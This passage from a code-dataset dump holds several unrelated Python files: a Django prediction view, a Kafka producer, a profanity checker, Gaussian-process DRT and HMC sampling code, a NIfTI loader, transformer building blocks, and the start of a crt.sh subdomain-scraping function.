'away')\n\n def existing_prediction(self):\n prediction = Prediction.objects.filter(match=self.object, user=self.request.user).select_related(\n 'user', 'match', 'match__home', 'match__away', 'most_foul')\n return prediction.exists(), prediction\n\n def prediction_deadline_exceeded(self):\n if self.object.start_time > timezone.now():\n return False\n return True\n\n def get_context_data(self, **kwargs):\n ctx = super().get_context_data(**kwargs)\n ctx['match_predictions'] = Prediction.objects.filter(match=self.object).select_related(\n 'user', 'match', 'match__home', 'match__away', 'most_foul', 'winning_team', 'match__outcome')\\\n .prefetch_related('user__my_points', 'user__my_points__match')\n predictions_exists, prediction_qs = self.existing_prediction()\n if predictions_exists:\n prediction_obj = prediction_qs.first()\n ctx['form'] = PredictionForm(initial={'prediction_id': prediction_obj.id,\n 'home_goal': prediction_obj.home_goal,\n 'away_goal': prediction_obj.away_goal,\n 'winning_team': prediction_obj.winning_team,\n 'red_card': prediction_obj.red_card,\n 'yellow_card': prediction_obj.yellow_card,\n 'penalty_goal': prediction_obj.penalty_goal,\n 'most_foul': prediction_obj.most_foul,\n 'bonus_answer': prediction_obj.bonus_answer}, match=self.object)\n else:\n ctx['form'] = PredictionForm(match=self.object)\n ctx['prediction_deadline_exceeded'] = self.prediction_deadline_exceeded()\n return ctx\n","repo_name":"tuxsisir/fifawc","sub_path":"match/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43039831627","text":"from confluent_kafka import Producer\nfrom faker import Faker\nimport json\n\np = Producer({'bootstrap.servers': 'b-2.xxxx.xxxx.xxxx.kafka.us-east-1.amazonaws.com:9092,b-1.xxxx.xxxx.xxxx.kafka.us-east-1.amazonaws.com:9092,b-3.xxxx.xxxx.xxxx.kafka.us-east-1.amazonaws.com:9092'})\n\ndef delivery_report(err, msg):\n\n if err is not None:\n print('Message delivery failed: {}'.format(err))\n else:\n print('Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))\n\n\nfake = Faker('en_US')\n\ndef gen_ran_data(i):\n data = {}\n data[\"ID\"] = i\n data[\"name\"] = fake.name()\n data[\"address\"] = fake.address()\n data[\"Email-ID\"] = fake.safe_email()\n return data\n\nfor i in range(0, 1000):\n x = json.dumps(gen_ran_data(i))\n print(x)\n p.poll(0)\n p.produce('sampleTopic', x.encode('utf-8'), callback=delivery_report)\n\np.flush()\n","repo_name":"harshdev93/AWS-MSK-Sample-Producer-Consumer","sub_path":"msk-producer.py","file_name":"msk-producer.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39262450384","text":"import urllib\n\ndef read_text():\n quotes = open(\"C:\\sdrive\\prac\\movie_quotes.txt\")\n contents_of_file = quotes.read()\n print(contents_of_file)\n quotes.close()\n check_profanity(contents_of_file)\n\ndef check_profanity(text_to_check):\n connection = urllib.urlopen(\"http://www.wdyl.com/profanity?q=\"+text_to_check)\n output = connection.read()\n connection.close()\n\n connection = urllib.urlopen(\"http://isithackday.com/arrpi.php?text=\"+text_to_check)\n pirateSpeech = connection.read()\n connection.close()\n\n #print(output)\n \n if \"true\" in output:\n print(\"Profanity Alert!! - Why do you love\")\n elif \"false\" in output:\n print(\"This document has no curse words! 
- wdyl\")\n else:\n print(\"Could not scan the document properly.\")\n\n print(pirateSpeech)\n \n if \"true\" in pirateSpeech:\n print(\"Profanity Alert!! - Pirate Speech\")\n elif \"false\" in pirateSpeech:\n print(\"No curse words - Pirate Speech\")\n else:\n print(\"Not scanned the doc\")\n\n \n\n \n\nread_text()\n","repo_name":"vkirangoud/LearnPython","sub_path":"ud036/check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73599318866","text":"\nimport numpy as np\nfrom numpy import inf, pi\nfrom numpy.random import randn\nfrom numpy.linalg import cholesky\nfrom numpy.matlib import repmat\nfrom math import pi, log, exp\nfrom numpy import linalg as la\nfrom numpy import *\n\ndef kernel(log_tau, log_tau_prime, sigma_f, ell):\n\n return (sigma_f**2)*exp(-0.5/(ell**2)*((log_tau-log_tau_prime)**2))\n\ndef compute_K(log_tau_vec, sigma_f, ell):\n\n N_tau = log_tau_vec.size\n out_K = np.zeros((N_tau, N_tau))\n\n for m in range(0, N_tau):\n\n log_tau_m = log_tau_vec[m]\n\n for n in range(0, N_tau):\n\n log_tau_n = log_tau_vec[n]\n out_K[m,n] = kernel(log_tau_m, log_tau_n, sigma_f, ell)\n \n out_K = 0.5*(out_K+out_K.T)\n return out_K\n\ndef compute_A_re(freq_vec, tau_vec):\n \n omega_vec = 2.*pi*freq_vec\n log_tau_vec = np.log(tau_vec)\n\n # number of elements in tau and freqs\n N_tau = tau_vec.size\n N_f = freq_vec.size\n\n # define output function\n out_A_re = np.zeros((N_f, N_tau))\n\n # integrand\n f_re = lambda omega, log_tau: 1./(1+(omega*exp(log_tau))**2)\n\n for m in range(0, N_f):\n \n for n in range(0, N_tau):\n \n if n == 0:\n log_tau_center = log_tau_vec[n]\n log_tau_right = 0.5*(log_tau_vec[n]+log_tau_vec[n+1])\n\n Delta_np1 = log_tau_vec[n+1]-log_tau_vec[n]\n\n a_vec = 1/4*np.array([Delta_np1, Delta_np1])\n I_vec = np.array([f_re(omega_vec[m], log_tau_center), \n f_re(omega_vec[m], log_tau_right)])\n\n elif n == N_tau-1:\n log_tau_left = 0.5*(log_tau_vec[n-1]+log_tau_vec[n])\n log_tau_center = log_tau_vec[n]\n\n Delta_nm1 = log_tau_vec[n]-log_tau_vec[n-1]\n a_vec = 0.25*np.array([Delta_nm1, Delta_nm1])\n I_vec = np.array([f_re(omega_vec[m], log_tau_left), \n f_re(omega_vec[m], log_tau_center)])\n\n else:\n log_tau_left = 0.5*(log_tau_vec[n-1]+log_tau_vec[n])\n log_tau_center = log_tau_vec[n]\n log_tau_right = 0.5*(log_tau_vec[n]+log_tau_vec[n+1])\n\n Delta_nm1 = log_tau_vec[n]-log_tau_vec[n-1]\n Delta_np1 = log_tau_vec[n+1]-log_tau_vec[n]\n\n a_vec = 0.25*np.array([Delta_nm1, Delta_nm1+Delta_np1, Delta_np1])\n I_vec = np.array([f_re(omega_vec[m], log_tau_left), \n f_re(omega_vec[m], log_tau_center), \n f_re(omega_vec[m], log_tau_right)])\n\n out_A_re[m,n] = np.dot(a_vec, I_vec)\n \n return out_A_re\n\ndef compute_A_im(freq_vec, tau_vec):\n \n omega_vec = 2.*pi*freq_vec\n log_tau_vec = np.log(tau_vec)\n\n # number of elements in tau and freqs\n N_tau = tau_vec.size\n N_f = freq_vec.size\n\n # define output function\n out_A_im = np.zeros((N_f, N_tau))\n\n # integrand\n f_im = lambda omega, log_tau: -omega*exp(log_tau)/(1+(omega*exp(log_tau))**2)\n\n for m in range(0, N_f):\n \n for n in range(0, N_tau):\n \n if n == 0:\n log_tau_center = log_tau_vec[n]\n log_tau_right = 0.5*(log_tau_vec[n]+log_tau_vec[n+1])\n\n Delta_np1 = log_tau_vec[n+1]-log_tau_vec[n]\n\n a_vec = 1/4*np.array([Delta_np1, Delta_np1])\n I_vec = np.array([f_im(omega_vec[m], log_tau_center), \n f_im(omega_vec[m], log_tau_right)])\n\n elif n == N_tau-1:\n log_tau_left = 
0.5*(log_tau_vec[n-1]+log_tau_vec[n])\n log_tau_center = log_tau_vec[n]\n\n Delta_nm1 = log_tau_vec[n]-log_tau_vec[n-1]\n a_vec = 0.25*np.array([Delta_nm1, Delta_nm1])\n I_vec = np.array([f_im(omega_vec[m], log_tau_left), \n f_im(omega_vec[m], log_tau_center)])\n\n else:\n log_tau_left = 0.5*(log_tau_vec[n-1]+log_tau_vec[n])\n log_tau_center = log_tau_vec[n]\n log_tau_right = 0.5*(log_tau_vec[n]+log_tau_vec[n+1])\n\n Delta_nm1 = log_tau_vec[n]-log_tau_vec[n-1]\n Delta_np1 = log_tau_vec[n+1]-log_tau_vec[n]\n\n a_vec = 0.25*np.array([Delta_nm1, Delta_nm1+Delta_np1, Delta_np1])\n I_vec = np.array([f_im(omega_vec[m], log_tau_left), \n f_im(omega_vec[m], log_tau_center), \n f_im(omega_vec[m], log_tau_right)])\n\n out_A_im[m,n] = np.dot(a_vec, I_vec)\n \n return out_A_im\n\n\n# Find the nearest positive-definite matrix\n\n#\"\"\"\n#Returns true when input is positive-definite, via Cholesky\n#is a matrix positive definite?\n#if input matrix is positive-definite (<=> Cholesky decomposable), then true is returned otherwise return false\n#\"\"\"\n\ndef is_PD(A):\n \n try:\n np.linalg.cholesky(A)\n return True\n except np.linalg.LinAlgError:\n return False\n\n\ndef nearest_PD(A):\n \n # based on \n # N.J. Higham (1988) https://doi.org/10.1016/0024-3795(88)90223-6\n # and \n # https://www.mathworks.com/matlabcentral/fileexchange/42885-nearestspd\n\n B = (A + A.T)/2\n _, Sigma_mat, V = la.svd(B)\n\n H = np.dot(V.T, np.dot(np.diag(Sigma_mat), V))\n\n A_nPD = (B + H) / 2\n A_symm = (A_nPD + A_nPD.T) / 2\n\n k = 1\n I = np.eye(A_symm.shape[0])\n\n while not is_PD(A_symm):\n eps = np.spacing(la.norm(A_symm))\n\n # MATLAB's 'chol' accepts matrices with eigenvalue = 0, numpy does not not. \n # So where the matlab implementation uses 'eps(mineig)', we use the above definition.\n\n min_eig = min(0, np.min(np.real(np.linalg.eigvals(A_symm))))\n A_symm += I * (-min_eig * k**2 + eps)\n k += 1\n\n return A_symm\n\n \n# calculate the negative marginal log-likelihood (NMLL)\ndef NMLL_fct(theta, A, Z_exp_re_im, N_freqs, log_tau_vec):\n\n # load the value of the parameters\n sigma_n = theta[0]\n sigma_R = theta[1]\n sigma_f = theta[2]\n ell = theta[3]\n\n # number of N\n N_taus = log_tau_vec.size \n\n # Gamma\n Gamma = np.zeros((N_taus+1, N_taus+1))\n Gamma[0,0] = sigma_R**2\n # compute the K matrix\n K = compute_K(log_tau_vec, sigma_f, ell)\n Gamma[1:, 1:] = K\n\n # put together the Gamma matrix\n Psi = A@(Gamma@A.T)+(sigma_n**2)*np.eye(2*N_freqs)\n Psi = 0.5*(Psi + Psi.T) # symmetrize\n \n # Cholesky decomposition of Psi\n if(is_PD(Psi)==False):\n Psi = nearest_PD(Psi)\n else:\n Psi = Psi\n \n L = np.linalg.cholesky(Psi)\n \n # solve for alpha\n alpha = np.linalg.solve(L, Z_exp_re_im)\n alpha = np.linalg.solve(L.T, alpha)\n\n return 0.5*np.dot(Z_exp_re_im,alpha) + np.sum(np.log(np.diag(L)))\n\ndef NMLL_L_fct(theta, A, Z_exp_re_im, N_freqs, log_tau_vec):\n\n # load the value of the parameters\n sigma_n = theta[0]\n sigma_L = theta[1]\n sigma_R = theta[2]\n sigma_f = theta[3]\n ell = theta[4]\n\n # number of N\n N_taus = log_tau_vec.size\n\n # Gamma\n Gamma = np.zeros((N_taus+2, N_taus+2))\n Gamma[0,0] = sigma_L**2\n Gamma[1,1] = sigma_R**2\n # compute the K matrix\n K = compute_K(log_tau_vec, sigma_f, ell)\n Gamma[2:, 2:] = K\n\n # put together the Gamma matrix\n Psi = A@(Gamma@A.T)+(sigma_n**2)*np.eye(2*N_freqs)\n Psi = 0.5*(Psi + Psi.T) # symmetrize\n \n if(is_PD(Psi)==False):\n Psi = nearest_PD(Psi)\n else:\n Psi = Psi\n \n # Cholesky decomposition of Psi\n L = np.linalg.cholesky(Psi)\n \n # solve for alpha\n 
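# two triangular solves give alpha = inv(Psi) @ Z_exp_re_im without forming the inverse\n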
alpha = np.linalg.solve(L, Z_exp_re_im)\n    alpha = np.linalg.solve(L.T, alpha)\n\n    return 0.5*np.dot(Z_exp_re_im,alpha) + np.sum(np.log(np.diag(L)))\n\ndef generate_tmg(F, g, M, mu_r, initial_X, cov=True, L=1):\n\n    \"\"\"\n    Implementation of the algorithm described in http://arxiv.org/abs/1208.4118\n    Author: Ari Pakman\n\n    Returns samples from a d-dimensional Gaussian with constraints given by F*X+g >0 \n    If cov == true\n    then M is the covariance and the mean is mu = mu_r \n    if cov == false \n    then M is the precision matrix and the log-density is -1/2 X'*M*X + r'*X\n\n    Input\n    F: m x d array\n    g: m x 1 array \n    M d x d array, must be symmetric and positive definite\n    mu_r d x 1 array \n    cov: see explanation above \n    L: number of samples desired\n    initial_X d x 1 array. Must satisfy the constraint.\n\n    Output\n    Xs: d x L array, each column is a sample\n\n    \"\"\"\n\n    # sanity check\n    m = g.shape[0]\n    if F.shape[0] != m:\n        print(\"Error: constraint dimensions do not match\")\n        return\n\n    # using covariance matrix\n    if cov:\n        mu = mu_r\n        g = g + F@mu\n        \n        ## Nearest Positive Definite \n        if not is_PD(M):\n            M = nearest_PD(M)\n        \n        R = cholesky(M)\n        R = R.T #change the lower matrix to upper matrix\n        F = F@R.T\n        initial_X = initial_X -mu\n        initial_X = np.linalg.solve(R.T, initial_X)\n    # using precision matrix\n    else:\n        r = mu_r\n        # Nearest Positive Definite \n        if not is_PD(M):\n            M = nearest_PD(M)\n        R = cholesky(M)\n        R = R.T #change the lower matrix to upper matrix\n        mu = np.linalg.solve(R, np.linalg.solve(R.T, r))\n        g = g + F@mu\n        F = np.linalg.solve(R, F)\n        initial_X = initial_X - mu\n        initial_X = R@initial_X\n\n    d = initial_X.shape[0] # dimension of mean vector; each sample must be of this dimension\n    bounce_count = 0\n    nearzero = 1E-12\n\n    # check that the initial point satisfies all constraints\n    if ((F@initial_X + g) < 0).any():\n        print(\"Error: inconsistent initial condition\")\n        return\n\n    # squared Euclidean norm of constraint matrix columns\n    F2 = np.sum(np.square(F), axis=1)\n    Ft = F.T\n\n    last_X = initial_X\n    Xs = np.zeros((d,L))\n    Xs[:,0] = initial_X\n\n    i=2\n\n    # generate samples\n    while i <=L:\n        \n        if i%1000 == 0:\n            print('Current sample number',i,'/', L)\n        \n        stop = False\n        j = -1\n        # generate initial velocity from normal distribution\n        V0 = randn(d)\n\n        X = last_X\n        T = pi/2\n        tt = 0\n\n        while True:\n            a = np.real(V0)\n            b = X\n\n            fa = F@a\n            fb = F@b\n\n            U = np.sqrt(np.square(fa) + np.square(fb))\n            # print(U.shape)\n\n            # has to be arctan2 not arctan\n            phi = np.arctan2(-fa, fb)\n\n            # find the locations where the constraints were hit\n            pn = np.array(np.abs(np.divide(g, U))<=1)\n            \n            if pn.any():\n                inds = np.where(pn)[0]\n                phn = phi[pn]\n                t1 = -1.0*phn + np.arccos(np.divide(-1.0*g[pn], U[pn]))\n                \n                # if there was a previous reflection (j > -1)\n                # and there is a potential reflection at the sample plane\n                # make sure that a new reflection at j is not found because of numerical error\n                if j > -1:\n                    if pn[j] == 1:\n                        temp = np.cumsum(pn)\n                        indj = temp[j]-1 # we changed this line\n                        tt1 = t1[indj]\n                        \n                        if np.abs(tt1) < nearzero or np.abs(tt1 - pi) < nearzero:\n                            # print(t1[indj])\n                            t1[indj] = inf\n                \n                mt = np.min(t1)\n                m_ind = np.argmin(t1)\n                # update j\n                j = inds[m_ind]\n                \n            else:\n                mt = T\n            \n            # update travel time\n            tt = tt + mt\n\n            if tt >= T:\n                mt = mt- (tt - T)\n                stop = True\n\n            # print(a)\n            # update position and velocity\n            X = a*np.sin(mt) + b*np.cos(mt)\n            V = a*np.cos(mt) - b*np.sin(mt)\n\n            if stop:\n                break\n            \n            # update new velocity\n            qj = F[j,:]@V/F2[j]\n            V0 = V - 2*qj*Ft[:,j]\n            \n            bounce_count += 1\n\n        if ((F@X + g) > 0).all():\n            Xs[:,i-1] = X\n            last_X = X\n            i = i+1\n\n        else:\n            print('hmc reject')\n\n    # need to transform back to unwhitened frame\n    if cov:\n        Xs = R.T@Xs + repmat(mu.reshape(mu.shape[0],1),1,L)\n    else:\n        Xs = np.linalg.solve(R, Xs) + repmat(mu.reshape(mu.shape[0],1),1,L)\n\n    # convert back to array\n    return Xs","repo_name":"ciuccislab/fGP-DRT","sub_path":"tutorials/finite_GP_DRT.py","file_name":"finite_GP_DRT.py","file_ext":"py","file_size_in_byte":12738,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
{"seq_id":"914022818","text":"from __future__ import division, print_function\n\nimport os\nimport logging\nimport traceback\n\nimport nibabel as nib\nimport numpy as np\n\nfrom .qpdata import DataGrid, QpData, NumpyData, Metadata\n\nLOG = logging.getLogger(__name__)\n\nQP_NIFTI_EXTENSION_CODE = 42\n\nclass NiftiData(QpData):\n    \"\"\"\n    QpData from a Nifti file\n    \"\"\"\n    def __init__(self, fname):\n        nii = nib.load(fname)\n        shape = list(nii.shape)\n        while len(shape) < 3:\n            shape.append(1)\n\n        if len(shape) > 3:\n            nvols = shape[3]\n        else:\n            nvols = 1\n\n        self.rawdata = None\n        self.voldata = None\n        self.nifti_header = nii.header\n        metadata = None\n        for ext in self.nifti_header.extensions:\n            if ext.get_code() == QP_NIFTI_EXTENSION_CODE:\n                import yaml\n                LOG.debug(\"Found QP metadata: %s\", ext.get_content())\n                try:\n                    yaml_data = yaml.safe_load(ext.get_content())\n                    LOG.debug(\"YAML data: %s\", yaml_data)\n                    if isinstance(yaml_data, Metadata):\n                        # Old style\n                        metadata = yaml_data\n                    else:\n                        # New style\n                        metadata = yaml_data[0][\"QpMetadata\"]\n                    LOG.debug(metadata)\n                except:\n                    # Never fail to load a file just because of metadata\n                    LOG.warn(\"Failed to read Quantiphyse metadata\")\n                    LOG.warn(ext.get_content())\n                    traceback.print_exc()\n\n        xyz_units, vol_units = \"mm\", None\n        units = nii.header.get_xyzt_units()\n        if units:\n            xyz_units = units[0]\n            if len(units) > 1:\n                vol_units = units[1]\n\n        vol_scale = 1.0\n        zooms = nii.header.get_zooms()\n        if zooms and len(zooms) > 3:\n            vol_scale = zooms[3]\n\n        grid = DataGrid(shape[:3], nii.header.get_best_affine(), units=xyz_units)\n        QpData.__init__(self, fname, grid, nvols, vol_unit=vol_units, vol_scale=vol_scale, fname=fname, metadata=metadata)\n\n    def raw(self):\n        # NB: copy() converts data to an in-memory array instead of a numpy file memmap.\n        # This improves speed drastically and avoids a bug when accessing subsets of the array:\n        # memmap saves RAM by keeping the array on disk, but it badly hurts performance and\n        # analysis, especially when the data lives on a network share.\n        if self.rawdata is None:\n            nii = nib.load(self.fname)\n            #self.rawdata = nii.get_fdata().copy()\n            self.rawdata = nii.get_fdata()\n            self.rawdata = self._correct_dims(self.rawdata)\n\n        self.voldata = None\n        return self.rawdata\n    \n    def volume(self, vol, qpdata=False):\n        vol = min(vol, self.nvols-1)\n        if self.nvols == 1:\n            ret = self.raw()\n        elif self.rawdata is not None:\n            ret = self.rawdata[:, :, :, vol]\n        else:\n            if self.voldata is None:\n                self.voldata = [None,] * self.nvols\n            if self.voldata[vol] is None:\n                nii = nib.load(self.fname)\n                self.voldata[vol] = self._correct_dims(nii.dataobj[..., vol])\n            ret = self.voldata[vol]\n\n        if qpdata:\n            return NumpyData(ret, grid=self.grid, name=\"%s_vol_%i\" % (self.name, vol))\n        else:\n            return ret\n\n    def _correct_dims(self, arr):\n        while arr.ndim < 3:\n            arr = np.expand_dims(arr, -1)\n\n        if 
self.metadata.get(\"raw_2dt\", False) and arr.ndim == 3:\n # Single-slice, interpret 3rd dimension as time\n arr = np.expand_dims(arr, 2)\n\n if arr.ndim == 4 and arr.shape[3] == 1:\n arr = np.squeeze(arr, axis=-1)\n return arr\n\ndef save(data, fname, grid=None, outdir=\"\"):\n \"\"\"\n Save data to a file\n \n :param data: QpData instance\n :param fname: File name\n :param grid: If specified, grid to save the data on\n :param outdir: Optional output directory if fname is not absolute\n \"\"\"\n if grid is None:\n grid = data.grid\n arr = data.raw().copy()\n else:\n arr = data.resample(grid).raw().copy()\n \n if hasattr(data, \"nifti_header\"):\n header = data.nifti_header.copy()\n else:\n header = None\n\n img = nib.Nifti1Image(arr, grid.affine, header=header)\n img.update_header()\n if data.metadata:\n from quantiphyse.utils.batch import to_yaml\n yaml_metadata = to_yaml({\"QpMetadata\" : data.metadata})\n LOG.debug(\"Writing metadata: %s\", yaml_metadata)\n extensions = nib.nifti1.Nifti1Extensions([ext for ext in img.header.extensions if ext.get_code() != QP_NIFTI_EXTENSION_CODE])\n extensions.append(nib.nifti1.Nifti1Extension(QP_NIFTI_EXTENSION_CODE, yaml_metadata.encode('utf-8')))\n img.header.extensions = extensions\n\n if not fname:\n fname = data.name\n \n _, extension = os.path.splitext(fname)\n if extension == \"\":\n fname += \".nii\"\n \n if not os.path.isabs(fname):\n fname = os.path.join(outdir, fname)\n\n dirname = os.path.dirname(fname)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n LOG.debug(\"Saving %s as %s\", data.name, fname)\n img.to_filename(fname)\n data.fname = fname\n","repo_name":"physimals/quantiphyse","sub_path":"quantiphyse/data/nifti.py","file_name":"nifti.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"38788227443","text":"\"\"\"\nListing 3.30\n\nThis example uses map() to multiply the numbers in the range 0 through 4\nby 2\n\nThe repeat() iterator does not need to be explicitly limited, since\nmap() stops processing when any of its input ends, and the range()\nreturns only five elements\n\"\"\"\nimport itertools\n\n\ndef main():\n for i in map(\n lambda x, y: (x, y, x * y),\n itertools.repeat(2),\n range(5)\n ):\n print(f\"{i[0]:d} * {i[1]:d} = {i[2]:d}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"8563a236e65cede7b14220e65c70ad5718144a3/python3-standard-library-solutions","sub_path":"Chapter03/0030_itertools_repeat_map.py","file_name":"0030_itertools_repeat_map.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2641575715","text":"#!/usr/bin/env python2.7\nfrom app import test\nfrom app import yumbot\nfrom app import means_shift\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Add or remove recipes from the database. Set the number of recipes to add/remove from the database')\n parser.add_argument('--action', default='distance', type=str,\n help='action can be distance,test,kmeans, or meansshift. Distance allows you to add a set of ingredients broken up by a comma. Test saves the distance between all ingredients and stats. 
Kmeans creates kmeans clusters.')\n parser.add_argument('--ingredients', default='garlic,thyme', type=str,\n help='Ingredients separated by a comma')\n\n args = parser.parse_args()\n if args.action == 'distance':\n ingredients = args.ingredients.split(\",\")\n test.test_pca(ingredients, True)\n elif args.action == 'test':\n test.create_database_snapshot()\n elif args.action == 'kmeans':\n test.kmeans_test()\n elif args.action == 'meansshift':\n means_shift.mean_shift_test()\n elif args.action == 'yumbot':\n print(yumbot.get_random_recipe())","repo_name":"SrutiG/YumBot","sub_path":"test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42295500700","text":"import math\nimport logging\nfrom functools import partial\nfrom collections import OrderedDict\nfrom typing import Optional\nfrom itertools import repeat\nimport collections.abc\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.checkpoint\n\n\ndef _ntuple(n):\n def parse(x):\n if isinstance(x, collections.abc.Iterable) and not isinstance(x, str):\n return x\n return tuple(repeat(x, n))\n\n return parse\n\n\nto_1tuple = _ntuple(1)\nto_2tuple = _ntuple(2)\nto_3tuple = _ntuple(3)\nto_4tuple = _ntuple(4)\nto_ntuple = _ntuple\n\n\nclass Mlp(nn.Module):\n \"\"\" MLP as used in Vision Transformer, MLP-Mixer and related networks\n \"\"\"\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, bias=True, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n bias = to_2tuple(bias)\n drop_probs = to_2tuple(drop)\n\n self.fc1 = nn.Linear(in_features, hidden_features, bias=bias[0])\n self.act = act_layer()\n self.drop1 = nn.Dropout(drop_probs[0])\n self.fc2 = nn.Linear(hidden_features, out_features, bias=bias[1])\n self.drop2 = nn.Dropout(drop_probs[1])\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop1(x)\n x = self.fc2(x)\n x = self.drop2(x)\n return x\n\n\ndef drop_path(x, drop_prob: float = 0., training: bool = False, scale_by_keep: bool = True):\n \"\"\"Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,\n the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...\n See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for\n changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use\n 'survival rate' as the argument.\n \"\"\"\n if drop_prob == 0. 
or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets\n random_tensor = x.new_empty(shape).bernoulli_(keep_prob)\n if keep_prob > 0.0 and scale_by_keep:\n random_tensor.div_(keep_prob)\n return x * random_tensor\n\n\nclass DropPath(nn.Module):\n \"\"\"Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n \"\"\"\n\n def __init__(self, drop_prob: float = 0., scale_by_keep: bool = True):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n self.scale_by_keep = scale_by_keep\n\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training, self.scale_by_keep)\n\n def extra_repr(self):\n return f'drop_prob={round(self.drop_prob, 3):0.3f}'\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0.):\n super().__init__()\n assert dim % num_heads == 0, 'dim should be divisible by num_heads'\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = head_dim ** -0.5\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, x):\n B, N, C = x.shape\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv.unbind(0) # make torchscript happy (cannot use tensor as tuple)\n\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n\nclass LayerScale(nn.Module):\n def __init__(self, dim, init_values=1e-5, inplace=False):\n super().__init__()\n self.inplace = inplace\n self.gamma = nn.Parameter(init_values * torch.ones(dim))\n\n def forward(self, x):\n return x.mul_(self.gamma) if self.inplace else x * self.gamma\n\n\nclass ParallelBlock(nn.Module):\n\n def __init__(\n self, dim, num_heads, num_parallel=2, mlp_ratio=4., qkv_bias=False, init_values=None,\n drop=0., attn_drop=0., drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm):\n super().__init__()\n self.num_parallel = num_parallel\n self.attns = nn.ModuleList()\n self.ffns = nn.ModuleList()\n for _ in range(num_parallel):\n self.attns.append(nn.Sequential(OrderedDict([\n ('norm', norm_layer(dim)),\n ('attn', Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, attn_drop=attn_drop, proj_drop=drop)),\n ('ls', LayerScale(dim, init_values=init_values) if init_values else nn.Identity()),\n ('drop_path', DropPath(drop_path) if drop_path > 0. else nn.Identity())\n ])))\n self.ffns.append(nn.Sequential(OrderedDict([\n ('norm', norm_layer(dim)),\n ('mlp', Mlp(dim, hidden_features=int(dim * mlp_ratio), act_layer=act_layer, drop=drop)),\n ('ls', LayerScale(dim, init_values=init_values) if init_values else nn.Identity()),\n ('drop_path', DropPath(drop_path) if drop_path > 0. 
else nn.Identity())\n ])))\n\n def _forward_jit(self, x):\n x = x + torch.stack([attn(x) for attn in self.attns]).sum(dim=0)\n x = x + torch.stack([ffn(x) for ffn in self.ffns]).sum(dim=0)\n return x\n\n @torch.jit.ignore\n def _forward(self, x):\n x = x + sum(attn(x) for attn in self.attns)\n x = x + sum(ffn(x) for ffn in self.ffns)\n return x\n\n def forward(self, x):\n if torch.jit.is_scripting() or torch.jit.is_tracing():\n return self._forward_jit(x)\n else:\n return self._forward(x)\n","repo_name":"LL3RD/ACFormer","sub_path":"ssod/models/utils/transformer_utils.py","file_name":"transformer_utils.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"75053259345","text":"from lxml import etree\nfrom dnsrecon.lib.msf_print import *\n\n\nfrom urllib.request import urlopen, Request\nfrom urllib.error import URLError, HTTPError\n\n\ndef scrape_crtsh(dom):\n \"\"\"\n Function for enumerating subdomains by scraping crt.sh.\n \"\"\"\n results = []\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\"\n }\n url = f\"https://crt.sh/?q=%25.{dom}\"\n\n req = Request(url=url, headers=headers)\n try:\n resp = urlopen(req, timeout=30)\n data = resp.read()\n except HTTPError as e:\n print_error(f'Bad http status from crt.sh: \"{e.code}\"')\n return results\n except URLError as e:\n print_error(f'Connection with crt.sh failed. Reason: \"{e.reason}\"')\n return results\n\n root = etree.HTML(data)\n tbl = root.xpath(\"//table/tr/td/table/tr/td[5]\")\n if len(tbl) < 1:\n print_error(\"Certificates for subdomains not found\")\n return results\n\n for ent in tbl:\n sub_dom = ent.text\n if not sub_dom.endswith(\".\" + dom):\n continue\n if 